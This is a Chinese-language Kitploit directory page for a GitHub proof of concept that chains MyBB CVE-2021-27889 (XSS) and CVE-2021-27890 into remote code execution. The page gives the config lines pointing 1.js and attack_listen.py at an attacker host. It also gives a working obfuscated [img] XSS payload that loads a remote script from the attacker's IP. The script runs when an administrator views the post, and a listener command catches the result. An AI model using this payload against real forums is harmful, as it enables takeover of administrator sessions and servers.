Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Mybb-XSS_SQL_RCE-POC — Mybb 关联 CVE-2021-27890 与 CVE-2021-27889 至 RCE poc | Kitploit
工具/GitHubGitHub/xiaopan233/mybb-xss_sql_rce-poc
Payload生成漏洞利用Web应用程序漏洞利用
GitHubxiaopan233/mybb-xss_sql_rce-poc

Mybb-XSS_SQL_RCE-POC

Mybb 关联 CVE-2021-27890 与 CVE-2021-27889 至 RCE poc

查看仓库
1025年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

Mybb-XSS_SQL_RCE-POC

Mybb 关联 CVE-2021-27890 & CVE-2021-27889 到 RCE POC

使用前:

这里有两个文件:1.js 和 attack_listen.py

你应该修改这两个文件:

1.js:

修改 mybb 论坛 URL 和攻击 URL:

root@kitploit:~
var bashurl = 'http://192.168.92.164/mybb/mybb-mybb_1825' #mybb forum url
var attack_url = 'http://192.168.92.165:8080/attack_success' #change the attack machine ip.should keep the same with the attack_listen.py

attack_listen.py

修改攻击主机和攻击端口:

root@kitploit:~
attack_host = '192.168.92.165'
attack_port = 8080

用法:

CVE-2021-27889 是 XSS。你应该在"新帖子"或"回复"或"私信"中注入以下有效载荷,然后再进行攻击。在这个演示中,我将有效载荷发送到"新帖子"。

注意:192.168.92.165 是恶意服务器 IP,你应该更改它。

root@kitploit:~
[img]http://evil.com/xx(http://evil.com/onerror=xs1=String.fromCharCode(47);xa1=document.createElement(/script/.source);xa1.src=xs1+xs1+/192.168.92.165/.source+xs1+/1.js/.source;document.getElementById(/header/.source).append(xa1);//[/img]


现在我们的恶意 JS 1.js 成功注入。然后我们应该等待管理员在已登录的管理页面 cookie 下浏览这个帖子。

注意:管理员用户无需登录论坛页面。


在等待期间,我们应该在攻击机上运行 "attack_listen.py",以判断管理员用户是否被攻击。

root@kitploit:~
python3 attack_listen.py

当管理员用户浏览恶意帖子时,恶意 JS 将执行攻击:


我们可以在攻击机上收到信息:

下载工具